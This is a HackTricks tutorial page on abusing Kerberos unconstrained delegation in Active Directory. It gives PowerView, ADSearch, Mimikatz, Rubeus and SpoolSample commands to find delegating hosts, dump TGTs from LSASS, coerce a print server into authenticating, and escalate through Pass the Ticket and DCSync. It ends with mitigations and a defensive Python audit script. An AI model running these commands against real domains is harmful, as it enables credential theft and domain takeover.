Unconstrained Delegation
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Unconstrained delegation
This is a feature that a Domain Administrator can set on any Computer inside the domain. Then, every time a user logs onto that Computer, a copy of that user's TGT is sent inside the TGS issued by the DC and saved in memory in LSASS. So, if you have Administrator privileges on that machine, you will be able to dump the tickets and impersonate the users on any machine.
So if a domain admin logs into a Computer with the "Unconstrained Delegation" feature enabled, and you have local admin privileges on that machine, you will be able to dump the ticket and impersonate the Domain Admin anywhere (domain privesc).
You can find Computer objects with this attribute by checking whether the userAccountControl attribute contains ADS_UF_TRUSTED_FOR_DELEGATION. You can do this with the LDAP filter '(userAccountControl:1.2.840.113556.1.4.803:=524288)', which is what powerview does:
```powershell
# List unconstrained computers
## Powerview
## DCs always appear and might be useful to attack a DC from another compromised DC from a different domain (coercing the other DC to authenticate to it)
Get-DomainComputer -Unconstrained -Properties name
Get-DomainUser -LdapFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
```
```
# Export tickets with Mimikatz
## Access LSASS memory
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
## Doesn't access LSASS memory directly, but uses Windows APIs
Rubeus.exe dump
Rubeus.exe monitor /interval:10 [/filteruser:<username>] #Check every 10s for new TGTs
```
Load the ticket of Administrator (or victim user) in memory with Mimikatz or Rubeus for a Pass the Ticket.
More info: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
More information about Unconstrained delegation in ired.team.
Force Authentication
If an attacker is able to compromise a computer allowed for "Unconstrained Delegation", he could trick a Print server to log in automatically against it, saving a TGT in the memory of the server.
Then, the attacker could perform a Pass the Ticket attack to impersonate the user Print server computer account.
To make a print server log in against any machine you can use SpoolSample:
```powershell
.\SpoolSample.exe <printmachine> <unconstrainedmachine>
```
If the TGT is from a domain controller, you could perform a DCSync attack and get all the hashes from the DC.
More info about this attack in ired.team.
Check here for other ways to force an authentication:
Force NTLM Privileged Authentication
Mitigation
- Limit DA/Admin logins to specific services
- Set "Account is sensitive and cannot be delegated" for privileged accounts.
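As an added audit example (not code from HackTricks, PowerView or ADSearch), the following Python decodes the userAccountControl bitmask that the LDAP filter in the enumeration section tests, evaluates the 1.2.840.113556.1.4.803 (LDAP_MATCHING_RULE_BIT_AND) rule locally, lists which sample computers are trusted for unconstrained delegation (separating DCs, which always carry the bit), and checks the second mitigation above by reporting privileged accounts that lack the NOT_DELEGATED flag ("Account is sensitive and cannot be delegated"). The account names and flag values in SAMPLE_ENTRIES are constructed; the flag constants are the standard ADS_USER_FLAG_ENUM values, and the generated filter string is the one shown on this page.

```python
"""Audit helpers for Kerberos unconstrained delegation.

Added example, not HackTricks' or PowerView's own code. It works on a list of
directory entries (dicts with sAMAccountName and userAccountControl) so it can
run offline against the constructed sample below; in practice the entries
would come from an LDAP query using unconstrained_filter().
"""

# userAccountControl bits relevant to this audit (ADS_USER_FLAG_ENUM values).
UAC_FLAGS = {
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,      # set on domain controllers
    "TRUSTED_FOR_DELEGATION": 0x80000,   # 524288: unconstrained delegation
    "NOT_DELEGATED": 0x100000,           # "Account is sensitive and cannot be delegated"
}

# LDAP_MATCHING_RULE_BIT_AND, the OID used in the page's filter.
LDAP_BIT_AND_OID = "1.2.840.113556.1.4.803"


def bit_and_filter(attribute, mask):
    """Build an extensible-match filter equivalent to `attribute & mask == mask`."""
    return "(%s:%s:=%d)" % (attribute, LDAP_BIT_AND_OID, mask)


def unconstrained_filter():
    """The filter PowerView uses for -Unconstrained (same string as on the page)."""
    return bit_and_filter("userAccountControl", UAC_FLAGS["TRUSTED_FOR_DELEGATION"])


def ldap_bit_and(value, mask):
    """Local evaluation of the bit-AND matching rule: every bit in mask must be set."""
    return (value & mask) == mask


def decode_uac(value):
    """Return the set of known flag names that are set in a userAccountControl value."""
    return {name for name, bit in UAC_FLAGS.items() if ldap_bit_and(value, bit)}


def find_unconstrained(entries):
    """Return [(sAMAccountName, is_dc)] for entries trusted for unconstrained delegation.

    DCs are marked separately: the bit is expected on them, so the entries a
    defender should review are the non-DC ones.
    """
    out = []
    for e in entries:
        flags = decode_uac(e["userAccountControl"])
        if "TRUSTED_FOR_DELEGATION" in flags:
            out.append((e["sAMAccountName"], "SERVER_TRUST_ACCOUNT" in flags))
    return out


def unprotected_privileged(entries, privileged):
    """Privileged accounts (by sAMAccountName) that lack NOT_DELEGATED."""
    return sorted(
        e["sAMAccountName"] for e in entries
        if e["sAMAccountName"] in privileged
        and "NOT_DELEGATED" not in decode_uac(e["userAccountControl"])
    )


# Constructed sample directory entries (hypothetical names and values).
SAMPLE_ENTRIES = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x2000 | 0x80000},      # DC, expected
    {"sAMAccountName": "FILESRV01$", "userAccountControl": 0x1000 | 0x80000},  # member server, review
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000},                # plain workstation
    {"sAMAccountName": "Administrator", "userAccountControl": 0x10200},       # missing NOT_DELEGATED
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x100200},         # protected
]
PRIVILEGED = {"Administrator", "svc_backup"}

if __name__ == "__main__":
    print("LDAP filter:", unconstrained_filter())
    for name, is_dc in find_unconstrained(SAMPLE_ENTRIES):
        print("unconstrained:", name, "(domain controller)" if is_dc else "(review)")
    for name in unprotected_privileged(SAMPLE_ENTRIES, PRIVILEGED):
        print("privileged account without NOT_DELEGATED:", name)
```

Run against real data, the entries would be the result of the unconstrained_filter() query for the first check and of a query over the privileged group members for the second; the local ldap_bit_and() shows why the filter on the page matches exactly the objects whose userAccountControl has bit 524288 set.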